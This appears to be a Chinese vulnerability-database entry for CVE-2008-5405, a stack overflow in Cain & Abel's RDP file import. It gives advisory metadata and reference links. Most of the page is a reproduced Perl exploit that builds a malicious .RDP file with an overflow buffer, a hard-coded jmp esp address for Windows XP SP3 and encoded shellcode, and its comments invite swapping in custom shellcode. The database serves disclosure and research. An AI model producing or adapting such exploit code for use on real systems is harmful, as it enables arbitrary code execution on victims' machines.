Cain & Abel RDP文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116876 漏洞类型 缓冲区溢出
发布时间 2008-11-30 更新时间 2009-01-29
CVE编号 CVE-2008-5405 CNNVD-ID CNNVD-200812-160
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7309
https://cxsecurity.com/issue/WLB-2008120100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-160
|漏洞详情
Cain&Abel是免费的密码恢复和破解软件。如果用户使用Cain&Abel导入了包含有超长字符(如8250个字符)的特制RDP文件的话,就可能触发栈溢出,导致执行任意代码。
|漏洞EXP
#!/usr/bin/perl
#
# Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit
# Exploit by SkD (skdrat@hotmail.com)
# -----------------------------------------------
#
# Nothing much to say about this one. This works on
# an updated Windows XP SP3. On Vista this exploit is way easier
# the more challenging one was on XP, and here it is.
# Enjoy :). Also remember if you want to put your own shellcode
# there are a few character restrictions and using Alpha2 or
# Alpha Numerical won't work at all.
# To open the .RDP file in Cain & Abel, click the
# "Remote Password Decoder Dialog" icon.
# Credits to Encrypt3d.M!nd.
# {Author has no responsibility over the damage you do with this!}

use strict; use warnings;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19".
"\xc5\xd8\x59\x83\xeb\xfc\xe2\xf4\xe5\x2d\x9c\x59\x19\xc5\x53\x1c".
"\x25\x4e\xa4\x5c\x61\xc4\x37\xd2\x56\xdd\x53\x06\x39\xc4\x33\x10".
"\x92\xf1\x53\x58\xf7\xf4\x18\xc0\xb5\x41\x18\x2d\x1e\x04\x12\x54".
"\x18\x07\x33\xad\x22\x91\xfc\x5d\x6c\x20\x53\x06\x3d\xc4\x33\x3f".
"\x92\xc9\x93\xd2\x46\xd9\xd9\xb2\x92\xd9\x53\x58\xf2\x4c\x84\x7d".
"\x1d\x06\xe9\x99\x7d\x4e\x98\x69\x9c\x05\xa0\x55\x92\x85\xd4\xd2".
"\x69\xd9\x75\xd2\x71\xcd\x33\x50\x92\x45\x68\x59\x19\xc5\x53\x31".
"\x25\x9a\xe9\xaf\x79\x93\x51\xa1\x9a\x05\xa3\x09\x71\x35\x52\x5d".
"\x46\xad\x40\xa7\x93\xcb\x8f\xa6\xfe\xa6\xb9\x35\x7a\xeb\xbd\x21".
"\x7c\xc5\xd8\x59";
my $addr = "\xb5\xb5\xfd\x7f";
my $overflow = "\x41" x 8206 ;
my $overflow2 = "\x41" x 255 ;
my $eip = "\xd7\x30\x9d\x7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)

open(my $rdp, "> s.rdp");
print $rdp $overflow.$eip.$addr.$overflow2.$shellcode;
close($rdp);

# milw0rm.com [2008-11-30]
|参考资料

来源:XF
名称:cainabel-rdp-bo(46940)
链接:http://xforce.iss.net/xforce/xfdb/46940
来源:BID
名称:32543
链接:http://www.securityfocus.com/bid/32543
来源:MILW0RM
名称:7309
链接:http://www.milw0rm.com/exploits/7309
来源:MILW0RM
名称:7297
链接:http://www.milw0rm.com/exploits/7297
来源:VUPEN
名称:ADV-2008-3286
链接:http://www.frsirt.com/english/advisories/2008/3286
来源:SREASON
名称:4703
链接:http://securityreason.com/securityalert/4703
来源:SECUNIA
名称:32794
链接:http://secunia.com/advisories/32794
来源:oxid.netsons.org
链接:http://oxid.netsons.org/phpBB2/viewtopic.php?t=2750
来源:OSVDB
名称:50342
链接:http://osvdb.org/50342